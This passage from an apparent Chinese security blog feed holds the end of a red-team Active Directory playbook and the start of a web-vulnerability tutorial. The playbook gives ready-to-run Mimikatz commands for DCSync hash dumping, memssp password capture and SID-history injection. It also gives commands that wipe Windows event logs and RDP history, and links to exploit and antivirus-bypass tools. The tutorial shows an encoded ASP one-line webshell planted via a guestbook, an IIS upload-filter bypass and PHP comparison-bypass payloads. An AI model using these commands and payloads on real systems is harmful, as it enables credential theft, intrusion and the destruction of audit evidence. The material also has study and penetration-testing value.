material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit</span></span><span class="line"><span style="color: #babed8"></span></span></code></pre></div><ul><li>Extract hashes from NTDS.dit<br>Recover it with esedbexport, then extract with ntdsxtract</li></ul><h4 id="AD持久化"><a href="#AD持久化" class="headerlink" title="AD持久化"></a>AD Persistence</h4><h5 id="活动目录持久性技巧"><a href="#活动目录持久性技巧" class="headerlink" title="活动目录持久性技巧"></a>Active Directory Persistence Tricks</h5><p><a href="https://adsecurity.org/?p=1929">https://adsecurity.org/?p=1929</a><br>DS Restore Mode password maintenance<br>DSRM password synchronization </p><blockquote><p>Windows Server 2008 needs the KB961320 patch installed to support DSRM password synchronization; Windows Server 2003 does not support DSRM password synchronization. KB961320: <a href="https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni">https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni</a>, see also: <a href="http://drops.xmd5.com/static/drops/tips-9297.html">Using DSRM password synchronization to make domain controller access persistent</a></p></blockquote><p><a href="https://www.dcshadow.com/">DCshadow </a></p><h5 id="Security-Support-Provider"><a href="#Security-Support-Provider" class="headerlink" title="Security Support Provider"></a>Security Support Provider</h5><p>Simply put, an SSP is a DLL used to implement authentication</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">privilege::debug</span></span><span class="line"><span style="color: #babed8">misc::memssp</span></span></code></pre></div><p>This way no reboot is needed; the newly created file kiwissp.log can be found in <code>c:/windows/system32</code></p><h5 id="SID-History"><a href="#SID-History" class="headerlink" title="SID History"></a><a href="https://adsecurity.org/?p=1772">SID History</a></h5><p>SID History allows the access of one account to be effectively cloned onto another account</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" 
tabindex="0"><code><span class="line"><span style="color: #babed8">mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator"</span></span></code></pre></div><h5 id="AdminSDHolder&SDProp"><a href="#AdminSDHolder&SDProp" class="headerlink" title="AdminSDHolder&SDProp "></a><a href="https://adsecurity.org/?p=1906">AdminSDHolder&SDProp </a></h5><p>利用AdminSDHolder&SDProp(重新)获取域管理权限 </p><h5 id="组策略"><a href="#组策略" class="headerlink" title="组策略"></a>组策略</h5><p><a href="https://adsecurity.org/?p=2716">https://adsecurity.org/?p=2716</a><br><a href="https://www.anquanke.com/post/id/86531">策略对象在持久化及横向渗透中的应用</a> </p><h5 id="Hook-PasswordChangeNotify"><a href="#Hook-PasswordChangeNotify" class="headerlink" title="Hook PasswordChangeNotify"></a>Hook PasswordChangeNotify</h5><p><a href="http://www.vuln.cn/6812">http://www.vuln.cn/6812</a></p><h5 id="Kerberoasting后门"><a href="#Kerberoasting后门" class="headerlink" title="Kerberoasting后门"></a>Kerberoasting后门</h5><p><a href="https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberoasting">域渗透-Kerberoasting</a></p><h5 id="AdminSDHolder"><a href="#AdminSDHolder" class="headerlink" title="AdminSDHolder"></a>AdminSDHolder</h5><p><a href="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence">Backdooring AdminSDHolder for Persistence</a></p><h5 id="Delegation"><a href="#Delegation" class="headerlink" title="Delegation"></a>Delegation</h5><p><a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence">Unconstrained Domain Persistence</a></p><h5 id="黄金证书"><a href="#黄金证书" class="headerlink" title="黄金证书"></a>黄金证书</h5><p><a href="https://blog.harmj0y.net/activedirectory/certified-pre-owned/">certified-pre-owned</a></p><p>证书伪造:<br><a href="https://github.com/Ridter/pyForgeCert">pyForgeCert</a></p><h4 id="其他-1"><a href="#其他-1" class="headerlink" title="其他"></a>其他</h4><h5 id="域内主机提权"><a 
href="#域内主机提权" class="headerlink" title="域内主机提权"></a>域内主机提权</h5><p><a href="https://github.com/Ridter/SharpAddDomainMachine">SharpAddDomainMachine</a></p><h5 id="Exchange的利用"><a href="#Exchange的利用" class="headerlink" title="Exchange的利用"></a>Exchange的利用</h5><ul><li><a href="https://github.com/ridter/owa_info"><strong>owa_info</strong></a></li><li><a href="https://github.com/Ridter/Exchange2domain"><strong>Exchange2domain</strong></a></li><li><a href="https://github.com/WyAtu/CVE-2018-8581/"><strong>CVE-2018-8581</strong></a></li><li><a href="https://github.com/Ridter/CVE-2019-1040"><strong>CVE-2019-1040</strong></a> </li><li><a href="https://github.com/Ridter/CVE-2020-0688"><strong>CVE-2020-0688</strong></a></li><li><a href="https://github.com/Arno0x/NtlmRelayToEWS"><strong>NtlmRelayToEWS</strong></a></li><li><a href="https://github.com/3gstudent/ewsManage"><strong>ewsManage</strong></a></li><li><a href="https://github.com/h4x0r-dz/CVE-2021-26855"><strong>CVE-2021-26855</strong></a></li><li><a href="https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda"><strong>CVE-2021-28482</strong></a></li><li><a href="https://github.com/hosch3n/ProxyVulns"><strong>ProxyVulns</strong></a></li><li><a href="https://github.com/testanull/ProxyNotShell-PoC"><strong>ProxyNotShell</strong></a></li><li><a href="https://github.com/balki97/OWASSRF-CVE-2022-41082-POC"><strong>OWASSRF-ProxyNotShell</strong></a></li><li><a href="https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e"><strong>Tabshell</strong></a></li></ul><h4 id="TIPS"><a href="#TIPS" class="headerlink" title="TIPS"></a>TIPS</h4><p><a href="https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed">《域渗透——Dump Clear-Text Password after KB2871997 installed》</a></p><p><a href="http://www.vuln.cn/6812">《域渗透——Hook PasswordChangeNotify》</a> </p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" 
data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>可通过Hook PasswordChangeNotify实时记录域控管理员的新密码 </p></blockquote><p><a href="http://www.liuhaihua.cn/archives/179102.html">《域渗透——Local Administrator Password Solution》 </a></p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 
11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>域渗透时要记得留意域内主机的本地管理员账号 </p></blockquote><p><a href="https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81">《域渗透——利用SYSVOL还原组策略中保存的密码》 </a></p><h4 id="相关工具"><a href="#相关工具" class="headerlink" title="相关工具"></a>相关工具</h4><ul><li><p><a href="https://github.com/BloodHoundAD/BloodHound">BloodHound </a></p></li><li><p><a href="https://github.com/byt3bl33d3r/CrackMapExec">CrackMapExec </a></p></li><li><p><a href="https://github.com/byt3bl33d3r/DeathStar">DeathStar</a> </p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" 
xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>利用过程:<a href="http://www.freebuf.com/sectool/160884.html">http://www.freebuf.com/sectool/160884.html</a></p></blockquote></li></ul><h3 id="在远程系统上执行程序"><a href="#在远程系统上执行程序" class="headerlink" title="在远程系统上执行程序"></a>在远程系统上执行程序</h3><ul><li>At </li><li>Psexec </li><li>WMIC </li><li>Wmiexec </li><li>Smbexec </li><li>Powershell remoting </li><li>DCOM </li><li>Winrm (<a href="https://github.com/Hackplayers/evil-winrm">https://github.com/Hackplayers/evil-winrm</a>)</li></ul><h3 
id="IOT相关"><a href="#IOT相关" class="headerlink" title="IOT相关"></a>IOT相关</h3><ul><li>1、路由器 <a href="https://github.com/reverse-shell/routersploit">routersploit </a></li><li>2、打印机 <a href="https://github.com/RUB-NDS/PRET">PRET </a></li><li>3、IOT exp <a href="https://www.exploitee.rs/">https://www.exploitee.rs/</a></li><li>4、相关<br><a href="https://www.owasp.org/index.php/OWASP_Nettacker">OWASP-Nettacker</a><br><a href="https://github.com/dark-lbp/isf">isf</a><br><a href="https://github.com/w3h/icsmaster">icsmaster</a></li></ul><h3 id="中间人"><a href="#中间人" class="headerlink" title="中间人"></a>中间人</h3><ul><li><a href="http://www.oxid.it/cain.html">Cain</a> </li><li><a href="https://github.com/Ettercap/ettercap">Ettercap</a> </li><li><a href="https://github.com/SpiderLabs/Responder">Responder</a> </li><li><a href="https://github.com/byt3bl33d3r/MITMf">MITMf</a> </li><li><a href="https://github.com/evilsocket/bettercap">3r/MITMf)</a></li></ul><h3 id="规避杀软及检测"><a href="#规避杀软及检测" class="headerlink" title="规避杀软及检测"></a>规避杀软及检测</h3><h4 id="Bypass-Applocker"><a href="#Bypass-Applocker" class="headerlink" title="Bypass Applocker"></a>Bypass Applocker</h4><p><a href="https://github.com/api0cradle/UltimateAppLockerByPassList">UltimateAppLockerByPassList </a><br><a href="https://lolbas-project.github.io/">https://lolbas-project.github.io/</a> </p><h4 id="BypassAV"><a href="#BypassAV" class="headerlink" title="BypassAV"></a>BypassAV</h4><ul><li>Empire </li><li>PEspin </li><li>Shellter </li><li>Ebowla </li><li>Veil </li><li>PowerShell </li><li>Python </li><li><a href="http://www.4hou.com/technology/9379.html">代码注入技术Process Doppelgänging </a></li><li>…</li></ul><h2 id="痕迹清理"><a href="#痕迹清理" class="headerlink" title="痕迹清理"></a>痕迹清理</h2><h3 id="Windows日志清除"><a href="#Windows日志清除" class="headerlink" title="Windows日志清除"></a><a 
href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87">Windows日志清除</a></h3><p>获取日志分类列表:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wevtutil el >1.txt</span></span></code></pre></div><p>获取单个日志类别的统计信息:<br>eg.</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wevtutil gli "windows powershell"</span></span></code></pre></div><p>回显:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">creationTime: 2016-11-28T06:01:37.986Z</span></span><span class="line"><span style="color: #babed8">lastAccessTime: 2016-11-28T06:01:37.986Z</span></span><span class="line"><span style="color: #babed8">lastWriteTime: 2017-08-08T08:01:20.979Z</span></span><span class="line"><span style="color: #babed8">fileSize: 1118208</span></span><span class="line"><span style="color: #babed8">attributes: 32</span></span><span class="line"><span style="color: #babed8">numberOfLogRecords: 1228</span></span><span class="line"><span style="color: #babed8">oldestRecordNumber: 1</span></span></code></pre></div><p>查看指定日志的具体内容:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wevtutil qe /f:text "windows 
powershell"</span></span></code></pre></div><p>删除单个日志类别的所有信息:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wevtutil cl "windows powershell"</span></span></code></pre></div><h3 id="破坏Windows日志记录功能"><a href="#破坏Windows日志记录功能" class="headerlink" title="破坏Windows日志记录功能"></a>破坏Windows日志记录功能</h3><p>利用工具 </p><ul><li><a href="https://github.com/hlldz/Invoke-Phant0m">Invoke-Phant0m</a> </li><li><a href="https://github.com/3gstudent/Windwos-EventLog-Bypass">Windwos-EventLog-Bypass</a></li></ul><h3 id="Metasploit"><a href="#Metasploit" class="headerlink" title="Metasploit"></a>Metasploit</h3><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">run clearlogs </span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">clearev </span></span></code></pre></div><h3 id="3389登陆记录清除"><a href="#3389登陆记录清除" class="headerlink" title="3389登陆记录清除"></a>3389登陆记录清除</h3><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">@echo off</span></span><span class="line"><span style="color: #babed8">@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f</span></span><span class="line"><span style="color: #babed8">@del "%USERPROFILE%\My Documents\Default.rdp" 
/a</span></span><span class="line"><span style="color: #babed8">@exit</span></span></code></pre></div>]]></content>
<summary type="html"><p> Author: <a href="https://twitter.com/Evi1cg">Evi1cg</a><br> Blog: <a href="https://evi1cg.github.io/">https://evi1cg.github.io</a></p>
</summary>
</entry>
<entry>
<title>Web Attack and Defense: Feature Vulnerabilities</title>
<link href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E7%89%B9%E6%80%A7%E6%BC%8F%E6%B4%9E.html"/>
<id>https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E7%89%B9%E6%80%A7%E6%BC%8F%E6%B4%9E.html</id>
<published>2024-03-03T06:48:26.000Z</published>
<updated>2024-03-05T15:55:59.512Z</updated>
<content type="html"><![CDATA[<h3 id="ASP安全"><a href="#ASP安全" class="headerlink" title="ASP安全"></a>ASP security</h3><ul><li>Common stack: windows+IIS+ASP+Access (or SQL Server)</li></ul><h4 id="安全问题"><a href="#安全问题" class="headerlink" title="安全问题:"></a>Security issues:</h4><h5 id="MDB默认下载"><a href="#MDB默认下载" class="headerlink" title="MDB默认下载"></a>Default MDB download</h5><ul><li>Access database files usually carry the extension asp/asa/mdb</li><li>When the browser requests an asp/asa file, the file is parsed and executed; requesting an mdb file downloads it</li><li>This can expose the site's sensitive data</li></ul><h5 id="ASP后门植入连接"><a href="#ASP后门植入连接" class="headerlink" title="ASP后门植入连接"></a>ASP backdoor implant and connection</h5><ul><li><p>Write a one-line webshell into the guestbook:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">┼攠數畣整爠煥敵瑳∨≡┩愾</span></span></code></pre></div><ul><li>The password is a</li></ul></li><li><p>Principle: the site has ASP parsing enabled, so requesting the database file directly returns its contents; once the one-liner has been written into it, a client connects to it</p></li></ul><h5 id="IIS短文件名探针安全漏洞"><a href="#IIS短文件名探针安全漏洞" class="headerlink" title="IIS短文件名探针安全漏洞"></a>IIS short filename enumeration vulnerability</h5><ul><li>Principle: <ul><li>For compatibility with 16-bit MS-DOS programs, Windows generates a Windows 8.3 short name for every file and folder with a long name. A name such as direct~1.asp, with a tilde in the middle, is a short filename</li></ul></li><li>Exploitation:<ul><li>Scanning the site's directories with a script leaks sensitive information (unlike dictionary-based scanning)</li></ul></li></ul><h5 id="中间件IIS文件上传解析"><a href="#中间件IIS文件上传解析" class="headerlink" title="中间件IIS文件上传解析"></a>IIS middleware file upload parsing</h5><ul><li><p>Flow: find an upload point on the site; upload an ASP webshell; if a filename check is present, bypass it by changing the file type; connect with a shell tool</p></li><li><p>A 1.jpg file is not parsed; renaming it to 1.asp;.jpg bypasses the check. Alternatively, a 1.jpg file placed under a directory named a.asp is also parsed</p></li></ul><h5 id="IIS配置目录读写"><a href="#IIS配置目录读写" class="headerlink" title="IIS配置目录读写"></a>IIS directory read/write configuration</h5><ul><li>This vulnerability exists when the site runs IIS 6.0 with write permission enabled and the WebDAV web service extension enabled</li></ul><h6 id="put攻击"><a href="#put攻击" class="headerlink" title="put攻击"></a>PUT attack</h6><ul><li>With the PUT method, when we browse a site and request a resource, the resource is replaced if it already exists on the site and created if it does not</li><li>Tools can use PUT to write a shell directly (桂林老兵)</li></ul><h3 id="NET项目-ASPX"><a href="#NET项目-ASPX" class="headerlink" title=".NET项目(ASPX)"></a>.NET projects (ASPX)</h3><ul><li>windows+iis+<strong>aspx</strong>+sqlserver</li></ul><h4 id="dll反编译"><a href="#dll反编译" class="headerlink" title="dll反编译"></a>DLL decompilation</h4><ul><li><a href="https://blog.csdn.net/weixin_34015860/article/details/93233036">Several tools for decompiling compiled DLL files (CSDN blog)</a></li><li><a href="https://github.com/icsharpcode/ILSpy">icsharpcode/ILSpy: .NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&more) - cross-platform! (github.com)</a></li></ul><h4 id="未授权访问"><a href="#未授权访问" class="headerlink" title="未授权访问"></a>Unauthorized access</h4><ul><li>Looking for unauthorized access<ul><li>Find the files that do not include the authentication code file</li><li>Check whether the authentication code file itself can be bypassed</li></ul></li></ul><h3 id="PHP特性"><a href="#PHP特性" class="headerlink" title="PHP特性"></a>PHP features</h3><h5 id="与"><a href="#与" class="headerlink" title="==与==="></a>== and ===</h5><h6 id="弱类型对比"><a href="#弱类型对比" class="headerlink" title="==弱类型对比"></a><code>==</code> loose (weak-type) comparison</h6><ul><li><p>Scenario 1: <em>bypass via a comparison defect</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">$a=1;</span></span><span class="line"><span style="color: #BABED8">if($a==$_GET['x']){</span></span><span class="line"><span style="color: #BABED8">    echo $flag;</span></span><span class="line"><span style="color: #BABED8">}</span></span></code></pre></div><p><em>1.0, +1, 1a and similar values all pass</em></p></li><li><p>Scenario 2: <em>bypass via an MD5 function defect</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">if($_GET['name'] != $_GET['password']){</span></span><span class="line"><span style="color: #BABED8">    if(MD5($_GET['name']) == MD5($_GET['password'])){</span></span><span class="line"><span style="color: #BABED8">        echo $flag;</span></span><span class="line"><span style="color: #BABED8">    }</span></span><span class="line"><span style="color: #BABED8">    echo '?';</span></span><span class="line"><span style="color: #BABED8">}</span></span></code></pre></div><ul><li>The MD5 values of <code>QNKCDZO</code> and <code>240610708</code> both begin with <strong>0e</strong>, which is interpreted as <strong>0 times 10 to some power</strong>, i.e. 0, so the == loose comparison is bypassed</li><li><code>name[]=1&password[]=2</code><br>Arrays cannot be MD5-hashed, so both results become null, which bypasses even the strict comparison</li></ul></li><li><p>Scenario 3: <em>bypass via an intval defect</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">$i='666';</span></span><span class="line"><span style="color: #BABED8">$ii=$_GET['n'];</span></span><span class="line"><span style="color: #BABED8">if(intval($ii)==$i){</span></span><span class="line"><span style="color: #BABED8">    echo $flag;</span></span><span class="line"><span style="color: #BABED8">}</span></span><span class="line"><span style="color: #BABED8">// 666.0 +666</span></span></code></pre></div><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">$i='666';</span></span><span class="line"><span style="color: #BABED8">$ii=$_GET['n'];</span></span><span class="line"><span style="color: #BABED8">if(intval($ii,0)==1){</span></span><span class="line"><span style="color: #BABED8">    echo $flag;</span></span><span class="line"><span style="color: #BABED8">}</span></span><span class="line"></span><span class="line"><span style="color: #BABED8">//0x29a</span></span></code></pre></div><ul><li>When intval is called with base <code>0</code>, it detects the numeric base automatically</li></ul></li><li><p>Scenario 4: <em>strpos() bypass</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">$i='666';</span></span><span class="line"><span style="color: #BABED8">$ii=$_GET['h'];</span></span><span class="line"><span style="color: #BABED8">if(strpos($ii==$i,"0")){</span></span><span class="line"><span style="color: #BABED8">    echo $flag;</span></span><span class="line"><span style="color: #BABED8">}</span></span><span class="line"></span><span class="line"><span style="color: #BABED8">// a newline (%0a) can be used to bypass this</span></span><span class="line"><span style="color: #BABED8">//?num=%0a666</span></span></code></pre></div></li><li><p>Scenario 5: <em>the third parameter of in_array</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">$whitelist = [1,2,3];</span></span><span class="line"><span style="color: #BABED8">$page=$_GET['i'];</span></span><span class="line"><span style="color: #BABED8">if (in_array($page, $whitelist)) {</span></span><span class="line"><span style="color: #BABED8">    echo "yes";</span></span><span class="line"><span style="color: #BABED8">}</span></span><span class="line"></span><span class="line"><span style="color: #BABED8">//?i=1ex</span></span></code></pre></div><ul><li>Without its third parameter (or with it set to false), in_array() compares with the <code>==</code> loose comparison</li></ul></li><li><p>Scenario 6: <em>preg_match</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">if(isset($_GET['num'])){</span></span><span class="line"><span style="color: #BABED8">    $num = $_GET['num'];</span></span><span class="line"><span style="color: #BABED8">    if(preg_match("/[0-9]/", $num)){</span></span><span class="line"><span style="color: #BABED8">        die("no no no!");</span></span><span class="line"><span style="color: #BABED8">    }</span></span><span class="line"><span style="color: #BABED8">    if(intval($num)){</span></span><span class="line"><span style="color: #BABED8">        echo $flag;</span></span><span class="line"><span style="color: #BABED8">    }</span></span><span class="line"><span style="color: #BABED8">}</span></span><span class="line"></span><span class="line"><span style="color: #BABED8">//?num[]=1</span></span></code></pre></div><ul><li><em>preg_match only handles strings; if something other than a string is passed, usually an array, it errors out and the check is skipped</em></li></ul></li><li><p>Scenario 7: <em>str_replace cannot filter iteratively</em></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: 
#89DDFF">$</span><span style="color: #BABED8">sql</span><span style="color: #89DDFF">=$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">s</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">sql</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">str_replace</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">select</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span><span style="color: #89DDFF">''</span><span style="color: #89DDFF">,$</span><span style="color: #BABED8">sql</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sql</span><span style="color: #89DDFF">;</span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic">//?s=sselectelect</span></span></code></pre></div><ul><li>只能过滤一次</li></ul></li></ul><h3 id="JavaWeb项目"><a href="#JavaWeb项目" class="headerlink" title="JavaWeb项目"></a>JavaWeb项目</h3><h4 id="代码逻辑引起漏洞"><a href="#代码逻辑引起漏洞" class="headerlink" 